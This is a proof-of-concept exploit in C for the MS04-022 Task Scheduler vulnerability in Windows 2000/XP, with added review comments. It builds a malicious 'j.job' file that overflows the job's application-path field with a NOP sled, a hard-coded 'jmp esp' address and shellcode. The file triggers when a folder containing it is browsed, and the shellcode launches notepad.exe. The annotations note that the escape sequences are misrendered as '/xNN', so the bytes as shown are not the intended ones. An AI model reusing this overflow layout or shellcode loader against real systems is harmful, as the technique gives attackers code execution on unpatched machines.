Microsoft Windows 2K/XP Task Scheduler .job Exploit (MS04-022)

代码:


//*************************************************************
// Microsoft Windows 2K/XP Task Scheduler Vulnerability (MS04-022)
// Proof-of-Concept Exploit for English WinXP SP1
// 15 Jul 2004
//
// Running this will create a file "j.job". When explorer.exe or any
// file-open dialog box accesses the directory containing this file,
// notepad.exe will be spawned.
//
// Greetz: snooq, sk and all guys at SIG^2 www security org sg
//
//*************************************************************

#include <stdio.h>
#include <windows.h>


/*
 * Crafted .job file image that main() writes to disk as "j.job".
 *
 * NOTE(review): on this page the escapes are rendered as "/xNN" rather
 * than "\xNN", so as printed these initializers are ordinary text and
 * not the byte values the author's comments refer to. The description
 * below is in terms of the intended bytes.
 *
 * Layout, from the author's comments and the visible bytes:
 *  - a short header, then a UTF-16LE string beginning "D:\a.aaa..."
 *    (bytes 44 00 3A 00 5C 00 61 00 2E 00 61 00 ...) — presumably the
 *    job's application-path field, padded far past a plausible length;
 *  - a long run of 0x90 bytes; main() copies `shellcode` into this run
 *    at byte offset 31*16;
 *  - UTF-16 padding "xxxxyyyyzzz{{{", the 4-byte value the author labels
 *    a "jmp esp" address, a two-byte landing pad and a two-byte backward
 *    short jump, then more padding and trailer fields.
 *
 * Not `const`: main() modifies it in place before writing it out.
 * Detection note: the distinguishing feature of the resulting file is an
 * application-name string far longer than any legitimate path.
 */
unsigned char jobfile[] =
"/x01/x05/x01/x00/xD9/xFF/xFF/xFF/xFF/xFF/xFF/xFF/xFF/xFF/xFF/xFF"
"/xFF/xFF/xFF/xFF/x46/x00/x92/x00/x00/x00/x00/x00/x3C/x00/x0A/x00"
"/x20/x00/x00/x00/x00/x14/x73/x0F/x00/x00/x00/x00/x03/x13/x04/x00"
"/xC0/x00/x80/x21/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x80/x01/x44/x00/x3A/x00/x5C/x00/x61/x00"
"/x2E/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00"

"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"

"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"


"/x78/x00/x78/x00/x78/x00/x78/x00/x79/x00/x79/x00/x79/x00/x79/x00"
"/x7A/x00/x7A/x00/x7A/x00/x7A/x00/x7B/x00/x7B/x00/x7B/x00"
"/x5b/xc1/xbf/x71" // jmp esp in SAMLIB WinXP SP1
"/x42/x42/x42/x42/x43/x43/x43/x43/x44/x44/x44/x44"
"/x90/x90" // jmp esp lands here
"/xEB/x80" // jmp backward into shellcode
"/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00"
"/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00"
"/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00"
"/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00"
"/x61/x00/x61/x00/x61/x00/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20"
"/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20"
"/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20"
"/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20"
"/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20"
"/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20"
"/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20"
"/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20"
"/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20"
"/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20"
"/x20/x20/x20/x20/x20/x20/x00/x00/x00/x00/x04/x00/x44/x00/x3A/x00"
"/x5C/x00/x00/x00/x07/x00/x67/x00/x75/x00/x65/x00/x73/x00/x74/x00"
"/x31/x00/x00/x00/x00/x00/x00/x00/x08/x00/x03/x13/x04/x00/x00/x00"
"/x00/x00/x01/x00/x30/x00/x00/x00/xD4/x07/x07/x00/x0F/x00/x00/x00"
"/x00/x00/x00/x00/x0B/x00/x26/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x01/x00/x00/x00/x01/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00";


/*
* Harmless payload that spawns 'notepad.exe'... =p
* Ripped from snooq's WinZip exploit
*/

/*
 * Payload stub that main() copies into `jobfile`. The per-instruction
 * comments are the author's: per those comments it assembles the string
 * "notepad.exe" on the stack, calls WinExec() and then ExitProcess().
 *
 * "XXXX" and "YYYY" are 4-byte placeholders. main() scans this array for
 * them and overwrites each with an address obtained from GetProcAddress()
 * at run time, which is why the array is not `const`. Because the scan
 * stops at the first zero byte, the stub must contain no 0x00 byte before
 * the placeholders.
 *
 * NOTE(review): rendered on this page with "/xNN" escapes rather than
 * "\xNN", so as printed the initializer is plain text, not the bytes the
 * comments describe.
 */
unsigned char shellcode[]=
"/x33/xc0" // xor eax, eax // slight modification to move esp up
"/xb0/xf0" // mov al, 0f0h
"/x2b/xe0" // sub esp,eax
"/x83/xE4/xF0" // and esp, 0FFFFFFF0h
"/x55" // push ebp
"/x8b/xec" // mov ebp, esp
"/x33/xf6" // xor esi, esi
"/x56" // push esi
"/x68/x2e/x65/x78/x65" // push 'exe.'
"/x68/x65/x70/x61/x64" // push 'dape'
"/x68/x90/x6e/x6f/x74" // push 'ton' (the leading 0x90 is a filler byte; lea below skips it)
"/x46" // inc esi
"/x56" // push esi
"/x8d/x7d/xf1" // lea edi, [ebp-0xf]
"/x57" // push edi
"/xb8XXXX" // mov eax, XXXX -> WinExec()  (placeholder patched by main)
"/xff/xd0" // call eax
"/x4e" // dec esi
"/x56" // push esi
"/xb8YYYY" // mov eax, YYYY -> ExitProcess()  (placeholder patched by main)
"/xff/xd0"; // call eax


/*
 * Entry point: patches the two placeholder addresses in `shellcode`,
 * copies the stub into `jobfile`, and writes the result out as "j.job".
 *
 * argc/argv are unused. Returns 0 unconditionally, including when
 * fopen() fails (nothing is written in that case).
 *
 * NOTE(review): Win32-only (windows.h, GetProcAddress, GetModuleHandle,
 * DeleteFile, MoveFile). memcpy() is used without an explicit
 * <string.h> include; presumably windows.h pulls it in — verify.
 */
int main(int argc, char* argv[])
{
/* Walk the payload one byte at a time until its terminating NUL. */
unsigned char *ptr = (unsigned char *)shellcode;

while (*ptr)
{
/*
 * Reinterprets the 4 bytes at ptr as a long and compares against
 * "XXXX" (0x58585858) / "YYYY" (0x59595959), then writes the looked-up
 * function address over the placeholder.
 * Caveats: accessing an unsigned char array through a long lvalue
 * violates strict aliasing (UB); the 4-byte read runs past the end of
 * the array at the last two loop positions; and casting the function
 * pointer to long assumes 32-bit pointers (true for Win32, not Win64).
 */
if (*((long *)ptr)==0x58585858)
{
*((long *)ptr) = (long)GetProcAddress(GetModuleHandle("kernel32.dll"), "WinExec");
}
if (*((long *)ptr)==0x59595959)
{
*((long *)ptr) = (long)GetProcAddress(GetModuleHandle("kernel32.dll"), "ExitProcess");
}
/* Advances one byte; a zero byte inside a just-written address ends the scan early. */
ptr++;
}

FILE *fp;
/* Written under a temporary name and renamed over "j.job" below. */
fp = fopen("j.xxx", "wb");
if(fp)
{
/* Shadows the outer `ptr`. Offset 31*16 = 496 falls inside the 0x90 run of `jobfile` in its intended byte layout. */
unsigned char *ptr = jobfile + (31 * 16);
/* sizeof - 1 drops the string terminator from the copy. */
memcpy(ptr, shellcode, sizeof(shellcode) - 1);

/* Return values of fwrite/fclose/DeleteFile/MoveFile are not checked. */
fwrite(jobfile, 1, sizeof(jobfile)-1, fp);
fclose(fp);
DeleteFile("j.job");
MoveFile("j.xxx", "j.job");
}
return 0;
}